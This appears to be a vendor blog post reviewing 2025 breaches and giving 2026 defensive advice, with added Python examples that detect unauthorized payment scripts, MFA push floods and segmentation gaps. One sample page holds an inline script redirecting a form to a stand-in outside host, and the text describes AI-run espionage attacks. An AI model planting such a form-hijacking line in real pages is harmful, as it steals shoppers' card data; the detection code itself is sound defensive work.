2026 Cybersecurity Outlook & Lessons

Looking back on the previous year’s cybersecurity lessons isn’t just a nostalgic exercise; it could offer a peek at 2026’s threats.


This is why the SecurityMetrics Threat Intelligence Center holds a yearly review of the previous year’s most critical breaches, technological shifts, and forensic data. The analysis draws on proprietary data from SecurityMetrics customers.

As Heff, Director of the Threat Intelligence Center, explains: "We'll give you our hits and our misses, but more importantly than that, we're going to give you some thoughts and pathways that you can travel to protect your business based on what happened in the news."

The Evolution of E-Commerce Threats: Beyond the Iframe

A primary focus for the SecurityMetrics Threat Intelligence team has been the security of the browser environment. For years, the industry relied on iframes to isolate sensitive payment data. However, 2025 marked a shift in how threat actors approach these boundaries.

Iframe Circumvention and Technical Countermeasures

Attackers have moved away from trying to break the iframe itself, focusing instead on exploiting the host page to bypass security entirely. 

Aaron Willis, of the SecurityMetrics forensics department, notes that while we predicted a full-scale counter-offensive to secure iframes, the reality was a mix of innovation and persistent vulnerability: 

"In the last few years, we saw a breach of those iframes where attackers were able to use various shenanigans and basically circumvent the iframes... [this] defeated a lot of business models out there that depended on the security of that iframe."

To combat this, leading security firms have introduced Armored Iframes and browser-level AI. Specifically, Willis highlights the work of Feroot:

"They provide their Payment Guard AI. That's integrating AI directly into the browser so they can see some real-time threats and adapt to that. They also implemented some X-Frame-Options, forcing people to enable that sandboxing to keep that thing secure."

The Compliance Landscape: PCI DSS 4.0.1

A major driver of security adoption in 2025 was the implementation of PCI DSS requirements 11.6.1 and 6.4.3. These were designed to force merchants to monitor and authorize all scripts running on their payment pages.

However, the massive rush we predicted for compliance was tempered by an architectural shift. Rather than hardening their existing environments, Willis observed a big pivot:

"One of the things that we did predict was that some merchants would try to switch to full payment redirects... instead of using an iframe, you just send the customer off to somebody else and let them deal with it. We saw a thirty percent increase in the number of merchants using full payment redirects."
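One way to implement the script authorization and change detection that requirements 6.4.3 and 11.6.1 call for, as an added example (not SecurityMetrics code): the payment page as served is compared with an approved script inventory and a header baseline. The hosts, script bodies, inventory layout and the `audit` helper are assumptions made for the demonstration.

```python
import base64, hashlib
from html.parser import HTMLParser

def sri(body: bytes) -> str:
    """SRI-style sha384 digest, kept in the inventory as the integrity record."""
    return "sha384-" + base64.b64encode(hashlib.sha384(body).digest()).decode()

class ScriptCollector(HTMLParser):  # gathers [src, inline_body] per <script>
    def __init__(self):
        super().__init__()
        self.scripts, self._open = [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts.append([dict(attrs).get("src"), ""])
            self._open = True
    def handle_data(self, data):
        if self._open:
            self.scripts[-1][1] += data
    def handle_endtag(self, tag):
        self._open = self._open and tag != "script"

def audit(html, fetch, headers, inventory, header_baseline):
    """Findings for a page as served, against the inventory and header baseline."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src, inline in collector.scripts:
        name = src or "inline"
        approved = inventory.get(name)      # None: script was never authorized
        if approved is None:
            findings.append(("unauthorized-script", name))
        elif sri(fetch(src) if src else inline.encode()) not in approved:
            findings.append(("script-changed", name))
    findings += [("header-changed", h) for h, v in header_baseline.items()
                 if headers.get(h) != v]    # header names assumed lower-cased
    return sorted(findings)

# Constructed sample: hosts, script bodies and policy are invented for the demo.
SERVED = {"https://pay.example/checkout.js": b"submitCard()",
          "https://cdn.example/stats.js": b"track();copy(form)",
          "https://unlisted.example/x.js": b"x()"}
INVENTORY = {"https://pay.example/checkout.js": {sri(b"submitCard()")},
             "https://cdn.example/stats.js": {sri(b"track()")}}
BASELINE = {"content-security-policy": "script-src pay.example cdn.example"}
PAGE = ("".join(f'<script src="{u}"></script>' for u in SERVED)
        + '<script>document.forms[0].action="//unlisted.example"</script>')

def demo():
    # Empty header dict simulates a response whose CSP header was stripped.
    return audit(PAGE, SERVED.__getitem__, {}, INVENTORY, BASELINE)
```

`demo()` reports the modified stats script, the unlisted external script, the unapproved inline script and the missing policy header, while the unchanged checkout script passes.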

Critical Breach Analysis: The 2025 Lessons

The previous year provided several case studies in failure that every small-to-medium business (SMB) should study.

The Jaguar Land Rover Vishing Incident

In September 2025, the "Scattered LAPSUS$ Hunters," a group of young but highly sophisticated actors, targeted Jaguar Land Rover, resulting in losses of approximately $2.5 billion USD. The method was not a technical exploit but a human one: vishing (voice phishing).

By cloning executive voices from public YouTube videos, the attackers gained access to the network. Heff emphasizes the danger of what happens next:

"The threat actors love to pivot. They love to figure out a doorway that you left unsecured and then move from that one doorway, maybe into the operational or manufacturing parts of your business... Jaguar did not have cyber insurance and had a lack of segmentation."

Supply Chain Vulnerabilities: Red Hat and GitLab

In October 2025, a breach at GitLab resulted in the theft of 570 gigabytes of data. This affected industry giants like IBM and Cisco by exposing VPN settings and API keys. This is a "multiplier effect" attack, where a single vendor compromise cascades through thousands of client environments.

Heff warns SMB owners that "chances are you have a lot of software in your business. A lot of third-party software that’s running right now, where you may not have the knowledge or the visibility into that to know if it’s secure or not."

The "Credential Buffet"

A massive aggregation of 16 billion records was discovered in June 2025. This "mega-leak" underscored the reality that credential stuffing is no longer an occasional threat; it is a constant background noise of the internet. 

Willis clarifies that this wasn't a single event but an aggregation: "It wasn't a single breach. This was just siphoning off credentials and just storing them on the dark web. That included Google and Apple logins."

The New Era: Autonomous AI Espionage

The most significant shift in threat actor methodology is the transition from AI-assisted to AI-orchestrated attacks. Anthropic's investigation into an espionage campaign involving the Claude Code tool serves as the primary example.

Heff describes the autonomy observed in these attacks: "AI performed eighty to ninety percent of the attack. We’re talking reconnaissance. We’re talking vulnerability discovery, exploitation, credential harvesting, and then, of course, the exfiltration of the data, all done by AI."

This effectively creates a "point-and-click" environment for cybercrime. 

Willis explains the danger: "AI just knows. It doesn't have to scan a database to find which components are available or have vulnerabilities. The AI looks for a vulnerable component and can try multiple exploits."

2026 Strategy: From Zero Trust to Containment Security

As we look toward the remainder of 2026, the "best practices" of three years ago are proving insufficient. We are moving toward a philosophy of Assumed Compromise.

1. The Death of SMS-Based MFA

The era of relying on text-message codes is ending. Multi-factor authentication (MFA) fatigue—spamming users until they click "Yes"—is a major exploit vector. 

Willis explains: "If you spam enough MFA requests, just by default, humans would hit yes. And that led to a large number of breaches. Attackers got around the MFA by exploiting human characteristics."

The 2026 standard is phishing-resistant MFA, utilizing hardware keys and passkeys that cannot be intercepted by scripts.
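Where push approvals are still in use, the request spam Willis describes is visible in authentication logs. The following detection is an added example, not SecurityMetrics code; the log format, the threshold of five prompts and the ten-minute window are assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

def detect_push_fatigue(lines, threshold=5, window=timedelta(minutes=10)):
    """Flag floods of unanswered MFA pushes, and approvals that follow one."""
    events = []
    for line in lines:
        ts, user, result = line.split()
        events.append((datetime.fromisoformat(ts), user, result))
    unanswered = defaultdict(deque)     # user -> times of denied/timed-out pushes
    alerts = []
    for ts, user, result in sorted(events):
        q = unanswered[user]
        while q and ts - q[0] > window:     # drop prompts that aged out
            q.popleft()
        if result in ("denied", "timeout"):
            q.append(ts)
            if len(q) == threshold:         # alert once, while the flood forms
                alerts.append(("prompt-flood", user, ts.isoformat(), len(q)))
        elif result == "approved":
            if len(q) >= threshold:         # approval given under pressure
                alerts.append(("approved-after-flood", user, ts.isoformat(), len(q)))
            q.clear()
    return alerts

# Constructed log lines in an invented "<ISO time> <user> <result>" format.
SAMPLE_LOG = """\
2025-09-01T02:10:05 alice timeout
2025-09-01T02:10:40 alice denied
2025-09-01T02:11:15 alice denied
2025-09-01T02:12:02 alice timeout
2025-09-01T02:12:50 alice denied
2025-09-01T02:13:31 alice timeout
2025-09-01T02:14:40 alice approved
2025-09-01T08:59:10 bob denied
2025-09-01T08:59:30 bob approved
2025-09-01T09:00:00 carol timeout
2025-09-01T11:00:00 carol timeout
2025-09-01T13:00:00 carol timeout
2025-09-01T15:00:00 carol timeout
2025-09-01T17:00:00 carol timeout
2025-09-01T17:00:20 carol approved
""".splitlines()

def demo():
    return detect_push_fatigue(SAMPLE_LOG)
```

Only alice triggers alerts: bob's single mistaken denial and carol's five timeouts spread across a day never reach five unanswered prompts inside one window.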

2. Targeting AI Agents and Vibe Coding

As businesses use AI to generate code (a trend known as vibe coding), they are inadvertently introducing unvetted vulnerabilities. Heff predicts that the "new target in small to medium-sized businesses will be your AI agent."

If you have a customer service bot or an automated coding agent, it must be governed with the same rigor as a human employee. Willis cautions that "when you're in a production environment and you're taking people's credit cards, you cannot rely on AI to give you secure code. It's not there. We’re not there yet."

3. Micro-Segmentation and Micro-Visibility

Zero Trust is evolving into Micro-segmentation. Heff notes that "the trend is to assume compromise and you move your business towards things like containment security... and if you think about it, it's a genius approach to take."

By isolating every segment of your network, you ensure that a breach in your marketing AI agent does not provide a path to your payment processing server.
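The containment claim above can be checked against firewall or security-group rules by searching for any chain of allowed flows from an untrusted segment to a protected one. This is an added example, not SecurityMetrics tooling; the rule format and every segment name other than the marketing AI agent and payment processing are constructed.

```python
from collections import deque

def find_path(allow_rules, source, target):
    """Shortest chain of allowed flows from source to target, or None."""
    graph = {}
    for src, dst, port in allow_rules:
        graph.setdefault(src, []).append((dst, port))
    queue, seen = deque([(source, [])]), {source}
    while queue:
        node, hops = queue.popleft()
        if node == target:
            return hops
        for dst, port in graph.get(node, []):
            if dst not in seen:
                seen.add(dst)
                queue.append((dst, hops + [(node, dst, port)]))
    return None

def containment_violations(allow_rules, untrusted, protected):
    """Each (untrusted, protected) pair joined by a chain of allow rules,
    mapped to that chain so the rule that bridges the segments can be found."""
    found = {}
    for src in untrusted:
        for dst in protected:
            path = find_path(allow_rules, src, dst)
            if path:
                found[(src, dst)] = path
    return found

# Constructed rule sets: (initiating segment, destination segment, TCP port).
FLAT = [
    ("marketing-ai-agent", "crm", 443),
    ("crm", "reporting", 22),                    # admin convenience rule
    ("reporting", "payment-processing", 5432),
    ("web-checkout", "payment-processing", 8443),
]
# Corrected rule set: the bridging rule is removed, every other flow stays.
SEGMENTED = [rule for rule in FLAT if rule != ("crm", "reporting", 22)]

def demo():
    pair = (["marketing-ai-agent"], ["payment-processing"])
    return (containment_violations(FLAT, *pair),
            containment_violations(SEGMENTED, *pair))
```

No single rule in `FLAT` connects the agent to the payment segment; the exposure only appears when the rules are chained, which is why the check walks the whole graph.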

A Community Effort

Cybersecurity in 2026 is an AI vs AI arms race. To survive, businesses must automate their defenses, using tools such as Shopping Cart Monitor and File Integrity Monitoring, to keep pace with present-day attackers.

Heff reminds us that "it’s a community effort, and there’s a lot of really smart people out there. You cannot do this on your own. Fortunately, we’ve got quite a few of them here at SecurityMetrics."
